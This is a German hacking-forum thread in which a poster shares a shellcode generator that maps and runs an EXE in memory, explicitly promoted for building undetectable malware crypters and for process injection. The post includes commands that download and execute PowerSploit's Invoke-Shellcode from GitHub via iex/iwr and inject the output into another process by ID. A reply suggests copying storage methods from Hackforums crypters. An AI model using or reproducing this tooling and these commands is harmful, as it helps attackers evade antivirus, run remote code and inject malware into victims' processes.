Jump to content

Willkommen Gast

Navigation

Links

Als Gast hast du nur eingeschränkten Zugriff!


Sign In 

Create Account

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Photo

LoadPEGen - Shellcode Generator für PE loading [32/64 Bit]

- - - - -

  • Please log in to reply
1 reply to this topic

#1
o0o

o0o

    Script Kiddie

  • Members
  • PipPipPipPip
  • Likes
    27
  • 33 posts
  • 15 Bedankt

Dieses Python script generiert einen Shellcode, der versucht eine angegebene native Exe im selben Prozess und selben Thread zu mappen und auszuführen.
Die auszuführende Datei wird ebenfalls in den Shellcode eingefügt.
Den Output kann man dann (am besten natürlich verschlüsselt) speichern und ganz einfach im eigenen Prozess (bspw mit CreateThread) ausführen oder einen fremden Prozess injecten, dabei natürlich jede denkbare Shellcode Execution / Process Injection Methode verwenden.
Konkret für einen Crypter müsste man sich also nur eine Storagemethode überlegen, und schon hat man le fud 1337 crypter, 40$ auf hackforums.

Nützt allerdings nichts gegen Memory Scanner wie bspw. der von ESET, sobald der Shellcode ausgeführt wird liegt die Datei offen im Speicher, und nach dem Mappen natürlich noch mal.
Außerdem failt das loaden auf 32bit Systemen wenn weder Host-Exe noch zu mappende Exe Relocations unterstützten, weil dann die Imagebase schon belegt ist.

Testen kann man es bspw. so:

 

> build_loadpe.py "C:\my\file.exe" out.bin

> powershell

> iex (iwr https://raw.githubusercontent.com/PowerShellMafia/PowerSploit/master/CodeExecution/Invoke-Shellcode.ps1)

> $bytes = [System.IO.File]::ReadAllBytes('out.bin')

> Invoke-Shellcode -Shellcode $bytes
or
> Invoke-Shellcode -Shellcode $bytes -ProcessId 3333 (injecting into remote process)

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.


  • Born2Hack and GhostSteel like this

<3 is all you need


Thanked by 10 Members:
webpanel0815 , parisdefr , breathplayslave , frodo91 , ERBOX , Zerobyte , mesagio , GhostSteel , gr33d , Born2Hack

#2
gr33d

gr33d

    Pentester

  • Premium Member
  • Likes
    169
  • 130 posts
  • 471 Bedankt
  • Android [root]
  • Windows, Linux

Vielen Dank für den Share. Für Storagemethoden würde ich mir einfach Hackforums Crypter anschauen. Die können zwar nicht viel aber man kann sich trotzdem was abschauen.


Edited by gr33d, 01 December 2017 - 02:49 Uhr.

  • Caruso likes this



  Topic Forum Started By Stats Last Post Info

user(s) are reading this topic

members, guests, anonymous users


This topic has been visited by 39 user(s)


    3eyes, Avni, Blackhook, Bloodman, Born2Hack, breathplayslave, Caruso, dev-0, dos, Dr. Spic, ERBOX, Exynos, fothermucker, Framerater, frodo91, GhostSteel, gr33d, h04x, kiwitone, mesagio, n1nja, nibble nibble, notfound, o0o, PadX18, pi^2, Psykoon303, Rogerlopensio, rsneumann, s3ff, Sandoz, sniffer, sup3ria, twixeis, VerZus, webpanel0815, xVirtu, Yuka, Zerobyte
Die besten Hacking Tools zum downloaden : Released, Leaked, Cracked. Größte deutschsprachige Hacker Sammlung.